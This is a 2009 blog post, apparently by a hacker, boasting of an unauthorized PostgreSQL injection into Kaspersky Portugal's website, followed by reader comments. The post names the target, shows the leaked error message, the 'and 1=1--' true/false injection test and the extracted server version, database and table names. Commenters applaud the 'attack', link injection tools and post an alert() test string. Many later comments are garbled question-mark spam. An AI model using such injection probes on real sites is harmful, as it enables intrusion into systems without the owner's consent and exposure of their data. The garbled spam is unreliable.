TinKode Stuff » Blog Archive

Kaspersky Owned

November 29th, 2009 TinKode Posted in PostGreSQL Injection | 83 Comments »

                     _   __                              _
                    | | / /                             | |
                    | |/ /  __ _ ___ _ __   ___ _ __ ___| | ___   _
                    |    \ / _` / __| '_ \ / _ \ '__/ __| |/ / | | |
                    | |\  \ (_| \__ \ |_) |  __/ |  \__ \   <| |_| |
                    \_| \_/\__,_|___/ .__/ \___|_|  |___/_|\_\\__, |
                                    | |                        __/ |
                                    |_|                       |___/

                                                                                  #owned by c0de.breaker

In one evening, when i searched a antivirus, I entered on the official kaspersky website of Portugal from mistake.
Link: www.kaspersky.com.pt
Kaspersky, from what i know has been hacked by “unu” with MySQLi.
So I said to try to see if I could find a vulnerability!
After 5 minutes of searching, I found something interesting, namely::

Warning: pg_exec() [function.pg-exec]: Query failed: ERROR: syntax error at or near "\" at character 306 in /home1/_sites/wwwkasperskycompt/kaspersky/PHP/IfDBRevendedoresKaspersky.phpclass on line 121 ERRO na execucao da query getRevendedors ERROR: syntax error at or near "\" at character 306

pg_exec() : That means as he use a PostgreSQL database.
First time, i checked to see if is injectable, and if i can extract something.
The answer:

———————————————————–
True: and 1=1–

False: and 1=2–

———————————————————–

So I can make PostGreSQL Injection!

What I extracted?
I wasn’t concerned about the content, I only “got” the names of databases, tables and columns.

#Principal Database: dbdoc #User: www-data #Version: PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)

#Other Databases

1 postgres 2 template1 3 template0 4 monitoring 5 estkaspersky 6 horde 7 licence 8 hardwareipbrick 9 acessosclientes 10 licencefmota 11 temp 12 dbdoc 13 webcalendar 14 ipbox 15 adcav 16 jpleitao2 17 funambol 18 gaia 19 cinel2 20 makeupdate 21 tempdefaultconfig

#The tables from dbdoc database (number:458)

1 table_base_idxml73 2 table_ass_idxml73_idtab1025 3 liga_tipoent_categoria 4 liga_subcat_categoria 5 classif_entidades 6 ignora 7 categoria_entidade 8 site 9 subcategoria_entidade 10 tabela_gestao_ipcontactos 11 ipcontactos_lang_files 12 utilizador_externo 13 webcal_sincro 14 pga_queries 15 pga_forms 16 pga_scripts 17 pga_reports 18 pga_schema 19 pga_layout 20 avaliar 21 estadorec1 22 liga_resultado_tarefa 23 webcal_user 24 utilizadores_operacao 25 webcal_entry 26 webcal_entry_repeats 27 webcal_entry_repeats_not 28 webcal_entry_user 29 webcal_entry_ext_user 30 webcal_user_pref 31 webcal_user_layers 32 exhumationprice 33 webcal_site_extras 34 webcal_reminder_log 35 webcal_group 36 table_base_idxml13 37 webcal_group_user 38 webcal_view 39 webcal_view_user 40 gravetype 41 webcal_entry_log 42 webcal_categories 43 webcal_config 44 cemeterysection 45 solucao 46 ipdoclanguages 47 ipdoctranslation 48 ipdocsentences 49 ipdocpages 50 ipdocpagetranslation 51 table_base_idxml15 52 table_ass_idxml15_idtab51 53 lockcodigos 54 assunto 55 table_base_idxml16 56 subassunto 57 table_ass_idxml16_idtab68 58 entidades2 59 coordenadas_estado 60 dados_infantarios 61 coordenadas_estadopr 62 codigo_accaopr 63 table_base_idxml17 64 raca 65 table_base_idxml18 66 table_base_idxml19 67 table_base_idxml20 68 table_base_idxml14 69 distrito 70 concelho ... 439 accaopr 440 table_base_idxml79 441 estadopr 442 funcaoproc 443 funcaopr 444 table_ass_idxml79_idtab1183 445 table_ass_idxml79_idtab1190 446 table_ass_idxml79_idtab1191 447 table_ass_idxml79_idtab1192 448 table_ass_idxml79_idtab1193 449 table_ass_idxml77_idtab1194 450 table_base_idxml78 451 table_ass_idxml80_idtab1216 452 table_base_idxml81 453 table_ass_idxml81_idtab1228 454 table_base_idxml70 455 table_base_idxml82 456 documento 457 revisaodoc 458 table_ass_idxml82_idtab1257

#Me: Ma gandesc, daca tot este una din cele mai mari compani din lume care asigura protectia poate a multor milioane de utilizatori prin produsele sale,
de ce nu au grija de propria securitatea in primul rand? Acest lucru poate fi si din cauza firmelor care creaza aceste website-uri intr-un timp foarte scurt pe sume exagerat de mari…
Cam atat.

~Where is a will, there is a way

Ne0h Says:
December 3rd, 2009 at 14:26

O treaba foarte buna mister.Te felicit pentru atac.
Doriti sa facem Blogroll?

Crisis Says:
December 3rd, 2009 at 18:02

Bravo TinKode !

volare Says:
December 4th, 2009 at 01:29

Mul?umesc,imi place:)Bravo;)

y2k Says:
December 4th, 2009 at 01:44

c***e daca nu imi dai niste licente…. nu ma mai joc cu tine

Twitted by jabra Says:
December 4th, 2009 at 07:51

[...] This post was Twitted by jabra [...]

Kerny Says:
December 4th, 2009 at 14:23

???????))))

The author the good fellow)))

Nytro Says:
December 5th, 2009 at 11:29

O, da, avem un hacker printre noi.

http://www.worldit.info/noutati/un-roman-a-spart-website-ul-kaspersky-din-portugalia/

Daca a inceput sa apara “owned”, “hacked” e clar. Si eu care te credeam mai cu cap…

TinKode Says:
December 5th, 2009 at 13:28

Si cum dorea-i sa pun: “Kaspersky floricele pe camp?”
Nu inteleg cand va vad ca va luati de niste porcarii minuscule.
Si daca ma uit mai bine nu am fost eu primul care a folosit aceste cuvinte!
Acolo de ce nu comentezi ca a folosit HACKED?
As spune mai multe, dar ma abtin!
A, daa, si eu te credeam mai cu cap, dar na…

sam Says:
December 5th, 2009 at 14:32

Ohh that’s great job mate, keep up

infosec Says:
December 6th, 2009 at 02:59

Great job… i wait a next big company!
Keep up

d3ck4 Says:
December 6th, 2009 at 11:56

nice finding TinKode!

http://hackingexpose.blogspot.com/2009/04/postgresql-error-base-sql-injection.html

http://hackingexpose.blogspot.com/2009/06/multi-purpose-postgresql-injection-tool.html

TinKode Says:
December 6th, 2009 at 17:05

@d3ck4:
Much better to make manual!
But sometimes it’s good to use some scripts (that only if you know how to make manual first time)

@infosec:
Will be soon!

#DataBase Says:
December 6th, 2009 at 18:28

alert(“Really nice job”)

d3ck4 Says:
December 7th, 2009 at 02:36

@TinKode
agree!
but dont tell me you extract all this data using manual
thats a lot of time consume did ya

TinKode Says:
December 7th, 2009 at 02:52

Manual all!
I didn’t use any tool!

bg Says:
December 7th, 2009 at 23:42

tin fmm intra pe mess ca ti-am spart un hash ))))))))))))

hexon Says:
December 8th, 2009 at 15:13

nice …. using cast command … i am still researching on that command (researching d3ck4′s tool) )

LOL1ds Says:
December 10th, 2009 at 23:25

SQLi never die… tinkode still breaker

SilaAlience Says:
December 13th, 2009 at 06:56

Hello, good work..

Stildinny Says:
December 29th, 2009 at 15:23

??????! ? ????????????? ??????? ??? ????. ???? ????? ?????????? ??? ? ???? ????????? ????? ????? ? ????? 2010 ?????. ????? ????, ????? ????????? ????? ? ?????????? ???? ????? ????????.

RakParplare Says:
December 31st, 2009 at 00:55

????????? ????????….?? ?????? ???????? ??????????b

Temiambib Says:
January 3rd, 2010 at 11:34

???????? ????! ??6

reilminiori Says:
January 3rd, 2010 at 23:46

?????????? ??????, ?? ?? ??? ?????. 4?

Wotrotaps Says:
January 4th, 2010 at 01:26

????? ????? ?? ??? ????, ? ??? ????? ????????? ??????? 7?

JesSizase Says:
January 4th, 2010 at 11:03

???????? ?? ?????????? ?? ??? ???? 9?

LagErroto Says:
January 4th, 2010 at 13:04

????? ? ???????? ? ??? ????? ?????? 6?

Daypemake Says:
January 4th, 2010 at 18:09

????????? ??????? ???????? ?? ???????? 8?

EverIrriple Says:
January 4th, 2010 at 20:57

???? ? ??????????? ????? ????????? ?????? 8?

relmSearieBes Says:
January 5th, 2010 at 11:17

????????? ??????, ??? ??????????? 7?

calSmease Says:
January 5th, 2010 at 14:23

????? ?????????? ??????, ??? ??????????? 6?

ApollaFak Says:
January 5th, 2010 at 16:15

? ??????????? ??? ????????? ??????????? 5?

Cluhulcek Says:
January 5th, 2010 at 18:54

????????? ??????? ???????? ?? ???????? 5?

Errobeidope Says:
January 5th, 2010 at 21:40

????? ?????? ????? ????? 7?

Kefunewhese Says:
January 6th, 2010 at 00:10

??????? ???? ???????? ??? ???????? 5?

Arrallizalock Says:
January 6th, 2010 at 11:58

????????? ??????? ???????? ?? ???????? 6?

Clustiolo Says:
January 6th, 2010 at 13:59

?????? ?????, ????, ??? ?????? ??????? 5?

Gagabubyenutt Says:
January 6th, 2010 at 21:34

????? ? ????????, ???? ??????? ?????? 5?

engergigmuh Says:
January 7th, 2010 at 00:20

????? ??????????? ??????, ?????? ???-??? ???????? ?? ???????? 5?

paviomoRamb Says:
January 7th, 2010 at 20:57

??? ?????????? ????? ?????? 3?

dundaspeste Says:
January 7th, 2010 at 22:42

????? ??????????? ??????, ?? ???-??? ?? ?????? ????? 4?

Insestync Says:
January 8th, 2010 at 00:13

?????????? ????? ??????, ??? ??? ?????? 4?

chumouddy Says:
January 8th, 2010 at 01:38

?????? ??????, ??? ??????????? 5?

exotoJoypedow Says:
January 8th, 2010 at 11:35

? ??????????? ??? ????????? ?????? 4?

lymnhooRn Says:
January 8th, 2010 at 13:50

????? ? ?????????????, ????? ??????? 4?

Prierypauri Says:
January 9th, 2010 at 11:07

????? ??????????? ??????, ?????? ?? ??? ????? 5?

Besticesk Says:
January 9th, 2010 at 13:03

????????? ??????, ??? ????????? ?????? 4?

Stildinny Says:
January 9th, 2010 at 13:06

????????? ????????. ? ?????????? ????????? ??????? ??? ??????????. ?????? ????? ????????? ?????????-???????? ????????? ?? ?????, ?????????? ?????????? ?????? ? ????? ????? ?????

Abintynoutt Says:
January 9th, 2010 at 16:21

????????? ??????? ?? ?????, ?? ?????????? ???????? 5?

Pointypinna Says:
January 9th, 2010 at 19:41

????? ??????????? ????? 3?

waiciassalsic Says:
January 9th, 2010 at 22:57

????????? ????? ?????, ?????? ????????? ??????? ????? ???????? 4?

Stildinny Says:
January 10th, 2010 at 20:12

??????? ????. ??? ???????!!!

TorpOptiorp Says:
January 10th, 2010 at 22:03

???? ? ????????, ??????? ???????? 2?

Dawnovavy Says:
January 11th, 2010 at 01:37

??????? ??????, ??? ????? ??????????? 2?

Guewemuri Says:
January 11th, 2010 at 05:05

??????? ???????? ?????? ????? ????? 1?

PooloLype Says:
January 11th, 2010 at 09:07

???????? ?????????? ?????? ?????, ???? ?? ??????? 2?

Dewsplaisee Says:
January 11th, 2010 at 12:44

?????? ? ????????, ????????? ????? ????? 5?

Niveinnosse Says:
January 11th, 2010 at 15:58

???? ?????? ??????????? ? ???? ????, ???????? ???????? 4?

honaabarm Says:
January 11th, 2010 at 19:16

??? ?????????? ????? ??????, ????? ????????? 3?

buddyglab Says:
January 11th, 2010 at 22:55

????? ?????????? ?????? 2?

Stildinny Says:
January 12th, 2010 at 07:06

? ??? ?? ????? ????? ??????????? ? ???? ???? ???? ? ???? ?? ??????. ?????? ??? ?????? ? ???? ?? ????? ?????…??????? 20. ????? ? ???? ??? ?? ???????????

dearriarern Says:
January 12th, 2010 at 08:00

????? ?????????? ????? ?????? 4?

waisyLivy Says:
January 12th, 2010 at 11:45

??? ????? ??????????? ???????? ?????? 3?

abiviggipse Says:
January 12th, 2010 at 14:48

?????????? ?????? ????????? 2?

Aresmeque Says:
January 12th, 2010 at 17:30

????? ????? ?? ??????? ??????? ?? ?????? ????????? 2?

Stildinny Says:
January 12th, 2010 at 19:14

?????? ???????. ??? ???????!!!

Staxiavak Says:
January 12th, 2010 at 20:47

??? ??????????? ???????? ?????? 3?